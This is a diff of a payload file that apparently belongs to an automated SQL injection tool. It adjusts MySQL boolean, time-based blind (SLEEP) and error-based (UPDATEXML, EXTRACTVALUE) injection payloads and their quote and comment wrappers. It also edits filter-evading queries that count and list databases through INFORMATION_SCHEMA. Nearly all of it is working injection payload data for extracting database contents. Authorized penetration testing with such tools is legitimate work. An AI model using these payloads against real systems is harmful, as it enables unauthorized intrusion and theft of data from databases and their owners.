skipped 174 lines 175 175 {"pref": ") ", "suf": "-- wXyW"}, 176 176 {"pref": "') ", "suf": "-- wXyW"}, 177 177 {"pref": '") ', "suf": "-- wXyW"}, 178 - {"pref": "' ", "suf": " OR '04586'='4586- - "}, 179 - {"pref": '" ', "suf": ' OR "04586"="4586- - '}, 178 + {"pref": "' ", "suf": " OR '04586'='4586"}, 179 + {"pref": '" ', "suf": ' OR "04586"="4586'}, 180 180 {"pref": ") ", "suf": " AND (04586=4586"}, 181 181 {"pref": ") ", "suf": " OR (04586=4586"}, 182 182 {"pref": "') ", "suf": " AND ('04586'='4586"}, skipped 217 lines 400 400 ], 401 401 "time-based": [ 402 402 { 403 - "payload": "(SELECT(1 )FROM(SELECT(SLEEP([SLEEPTIME])))a)", 403 + "payload": "(SELECT(0 )FROM(SELECT(SLEEP([SLEEPTIME])))a)", 404 404 "comments": [ 405 405 {"pref": "'XOR", "suf": "XOR'Z"}, 406 406 {"pref": '"XOR', "suf": 'XOR"Z'}, skipped 18 lines 425 425 # {"pref": '")AND', "suf": 'AND("1"="1-- wXyW'}, 426 426 ], 427 427 "title": "MySQL >= 5.0.12 time-based blind (query SLEEP)", 428 - "vector": "(SELECT(1 )FROM(SELECT(IF([INFERENCE],SLEEP([SLEEPTIME]),0)))a)", 428 + "vector": "(SELECT(0 )FROM(SELECT(IF([INFERENCE],SLEEP([SLEEPTIME]),0)))a)", 429 429 "dbms": "MySQL", 430 430 }, 431 431 { skipped 333 lines 765 765 "dbms": "MySQL", 766 766 }, 767 767 { 768 - "payload": "AND UPDATEXML(0,CONCAT(0x7e,0x72306f746833783439,0x7e),0)", 768 + "payload": "UPDATEXML(0,CONCAT(0x7e,0x72306f746833783439,0x7e),0)", 769 769 "comments": [ 770 - # {"pref": " ", "suf": ""}, 771 - {"pref": " ", "suf": "- - wXyW "}, 772 - {"pref": " ", "suf": "# "}, 770 + {"pref": "", "suf": ""}, 771 + {"pref": "( ", "suf": ") "}, 772 + {"pref": " AND ", "suf": "- - wXyW "}, 773 + {"pref": " AND ", "suf": "#"}, 773 774 # {"pref": "' ", "suf": ""}, 774 - {"pref": "' ", "suf": "-- wXyW"}, 775 - {"pref": "' ", "suf": "#"}, 775 + {"pref": "' AND ", "suf": "-- wXyW"}, 776 + {"pref": "' AND ", "suf": "#"}, 776 777 # {"pref": '" ', "suf": ""}, 777 - {"pref": '" ', "suf": "-- wXyW"}, 778 - {"pref": '" ', "suf": "#"}, 778 + {"pref": '" AND ', "suf": "-- wXyW"}, 779 + {"pref": '" AND ', "suf": "#"}, 779 780 # {"pref": ") ", "suf": ""}, 780 - {"pref": ") ", "suf": "-- wXyW"}, 781 - {"pref": ") ", "suf": "#"}, 781 + {"pref": ") AND ", "suf": "-- wXyW"}, 782 + {"pref": ") AND ", "suf": "#"}, 782 783 # {"pref": "') ", "suf": ""}, 783 - {"pref": "') ", "suf": "-- wXyW"}, 784 - {"pref": "') ", "suf": "#"}, 784 + {"pref": "') AND ", "suf": "-- wXyW"}, 785 + {"pref": "') AND ", "suf": "#"}, 785 786 # {"pref": '") ', "suf": ""}, 786 - {"pref": '") ', "suf": "-- wXyW"}, 787 - {"pref": '") ', "suf": "#"}, 787 + {"pref": '") AND ', "suf": "-- wXyW"}, 788 + {"pref": '") AND ', "suf": "#"}, 788 789 ], 789 790 "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)", 790 - "vector": "AND UPDATEXML(0,CONCAT(0x28 , 0x7e,[INFERENCE],0x7e),0)", 791 + "vector": "UPDATEXML(0,CONCAT(0x7e,[INFERENCE],0x7e),0)", 791 792 "dbms": "MySQL", 792 793 }, 793 794 { 794 - "payload": "AND EXTRACTVALUE(0,CONCAT(0x7e,0x72306f746833783439,0x7e))", 795 + "payload": "EXTRACTVALUE(0,CONCAT(0x7e,0x72306f746833783439,0x7e))", 795 796 "comments": [ 796 - # {"pref": " ", "suf": ""}, 797 - {"pref": " ", "suf": "- - wXyW "}, 798 - {"pref": " ", "suf": "# "}, 797 + {"pref": "", "suf": ""}, 798 + {"pref": "( ", "suf": ") "}, 799 + {"pref": " AND ", "suf": "- - wXyW "}, 800 + {"pref": " AND ", "suf": "#"}, 799 801 # {"pref": "' ", "suf": ""}, 800 - {"pref": "' ", "suf": "-- wXyW"}, 801 - {"pref": "' ", "suf": "#"}, 802 + {"pref": "' AND ", "suf": "-- wXyW"}, 803 + {"pref": "' AND ", "suf": "#"}, 802 804 # {"pref": '" ', "suf": ""}, 803 - {"pref": '" ', "suf": "-- wXyW"}, 804 - {"pref": '" ', "suf": "#"}, 805 + {"pref": '" AND ', "suf": "-- wXyW"}, 806 + {"pref": '" AND ', "suf": "#"}, 805 807 # {"pref": ") ", "suf": ""}, 806 - {"pref": ") ", "suf": "-- wXyW"}, 807 - {"pref": ") ", "suf": "#"}, 808 + {"pref": ") AND ", "suf": "-- wXyW"}, 809 + {"pref": ") AND ", "suf": "#"}, 808 810 # {"pref": "') ", "suf": ""}, 809 - {"pref": "') ", "suf": "-- wXyW"}, 810 - {"pref": "') ", "suf": "#"}, 811 + {"pref": "') AND ", "suf": "-- wXyW"}, 812 + {"pref": "') AND ", "suf": "#"}, 811 813 # {"pref": '") ', "suf": ""}, 812 - {"pref": '") ', "suf": "-- wXyW"}, 813 - {"pref": '") ', "suf": "#"}, 814 + {"pref": '") AND ', "suf": "-- wXyW"}, 815 + {"pref": '") AND ', "suf": "#"}, 814 816 ], 815 817 "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)", 816 - "vector": "AND EXTRACTVALUE(0,CONCAT(0x7e,[INFERENCE],0x7e))", 818 + "vector": "EXTRACTVALUE(0,CONCAT(0x7e,[INFERENCE],0x7e))", 817 819 "dbms": "MySQL", 818 820 }, 819 821 { skipped 23 lines 843 845 "dbms": "MySQL", 844 846 }, 845 847 { 846 - "payload": "AND UPDATEXML(0,CONCAT_WS('r0oth3x49'),0)", 848 + "payload": "AND UPDATEXML(0,CONCAT_WS('( ' , ' ~ ' , ' r0oth3x49' , ' ~ '),0)", 847 849 "comments": [ 848 850 # {"pref": " ", "suf": ""}, 849 851 {"pref": " ", "suf": "-- wXyW"}, skipped 123 lines 973 975 "dbms": "MySQL", 974 976 }, 975 977 { 976 - "payload": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,0x72306f746833783439,0x7e))", 978 + "payload": "EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,0x72306f746833783439,0x7e))", 977 979 "comments": [ 978 - # {"pref": " ", "suf": ""}, 979 - {"pref": " ", "suf": "- - wXyW "}, 980 - {"pref": " ", "suf": "# "}, 980 + {"pref": "", "suf": ""}, 981 + {"pref": "( ", "suf": ") "}, 982 + {"pref": " AND ", "suf": "- - wXyW "}, 983 + {"pref": " AND ", "suf": "#"}, 981 984 # {"pref": "' ", "suf": ""}, 982 - {"pref": "' ", "suf": "-- wXyW"}, 983 - {"pref": "' ", "suf": "#"}, 985 + {"pref": "' AND ", "suf": "-- wXyW"}, 986 + {"pref": "' AND ", "suf": "#"}, 984 987 # {"pref": '" ', "suf": ""}, 985 - {"pref": '" ', "suf": "-- wXyW"}, 986 - {"pref": '" ', "suf": "#"}, 988 + {"pref": '" AND ', "suf": "-- wXyW"}, 989 + {"pref": '" AND ', "suf": "#"}, 987 990 # {"pref": ") ", "suf": ""}, 988 - {"pref": ") ", "suf": "-- wXyW"}, 989 - {"pref": ") ", "suf": "#"}, 991 + {"pref": ") AND ", "suf": "-- wXyW"}, 992 + {"pref": ") AND ", "suf": "#"}, 990 993 # {"pref": "') ", "suf": ""}, 991 - {"pref": "') ", "suf": "-- wXyW"}, 992 - {"pref": "') ", "suf": "#"}, 994 + {"pref": "') AND ", "suf": "-- wXyW"}, 995 + {"pref": "') AND ", "suf": "#"}, 993 996 # {"pref": '") ', "suf": ""}, 994 - {"pref": '") ', "suf": "-- wXyW"}, 995 - {"pref": '") ', "suf": "#"}, 997 + {"pref": '") AND ', "suf": "-- wXyW"}, 998 + {"pref": '") AND ', "suf": "#"}, 996 999 ], 997 1000 "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)", 998 - "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))", 1001 + "vector": "EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))", 999 1002 "dbms": "MySQL", 1000 1003 }, 1001 1004 { skipped 19 lines 1021 1024 {"pref": '") ', "suf": "#"}, 1022 1025 ], 1023 1026 "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)", 1024 - "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))", 1027 + "vector": "OR EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))", 1025 1028 "dbms": "MySQL", 1026 1029 }, 1027 1030 # { skipped 769 lines 1797 1800 PAYLOADS_DBS_COUNT = { 1798 1801 "MySQL": [ 1799 1802 "(SELECT COUNT(*)FROM(INFORMATION_SCHEMA.SCHEMATA))", 1800 - "(/*!SELECT*//**_**/COUNT(*)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/))", 1801 1803 "(/*!50000SELECT*/ COUNT(*)/*!50000FROM*//*!50000(INFORMATION_SCHEMA.SCHEMATA)*/)", 1802 1804 "(/*!50000SELECT*/ COUNT(*)/*!50000FROM*/(/*!50000INFORMATION_SCHEMA*/./*!50000SCHEMATA*/))", 1805 + # "(/*!SELECT*//**_**/COUNT(*)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/))", 1803 1806 ], 1804 1807 "PostgreSQL": [ 1805 1808 "(SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables)", skipped 30 lines 1836 1839 "(SELECT IFNULL(SCHEMA_NAME,0x20) FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT 0,1)", 1837 1840 "(SELECT CONCAT(SCHEMA_NAME)FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT 0,1)", 1838 1841 "(SELECT CONCAT/**_**/(SCHEMA_NAME)FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT 0,1)", 1839 - "(/*!SELECT*//**_**/CONCAT/**_**/(/*!50000SCHEMA_NAME*/)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/))LIMIT 0,1", 1840 1842 "(SELECT CONCAT_WS(0x28,0x7e,SCHEMA_NAME)FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT 0,1)", 1841 1843 "(/*!SELECT*/ CONCAT_WS(0x28,0x7e,/*!SCHEMA_NAME*/)FROM(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/)LIMIT/**_**/0,1)", 1844 + # "(/*!SELECT*//**_**/CONCAT/**_**/(/*!50000SCHEMA_NAME*/)/**_**/FROM/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/)%23LIMIT 0,1)", 1842 1845 ], 1843 1846 "PostgreSQL": [ 1844 1847 "(SELECT DISTINCT(schemaname) FROM pg_tables ORDER BY schemaname OFFSET 0 LIMIT 1)", skipped 208 lines